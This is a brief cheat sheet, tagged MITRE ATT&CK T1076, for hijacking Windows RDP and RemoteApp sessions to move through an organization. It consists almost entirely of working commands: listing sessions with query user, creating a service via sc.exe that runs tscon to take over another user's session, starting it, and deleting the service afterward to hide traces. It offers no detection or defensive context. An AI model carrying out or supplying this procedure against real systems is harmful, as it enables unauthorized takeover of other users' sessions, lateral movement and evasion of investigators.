MITRE ATT&CK Technique: T1076
RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organization
retrieve the session ID:
query user
Set the session ID and rdp-tcp# retrieved from query user
sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"
Access the session:
net start sesshijack
Clean up afterward:
sc.exe delete sesshijack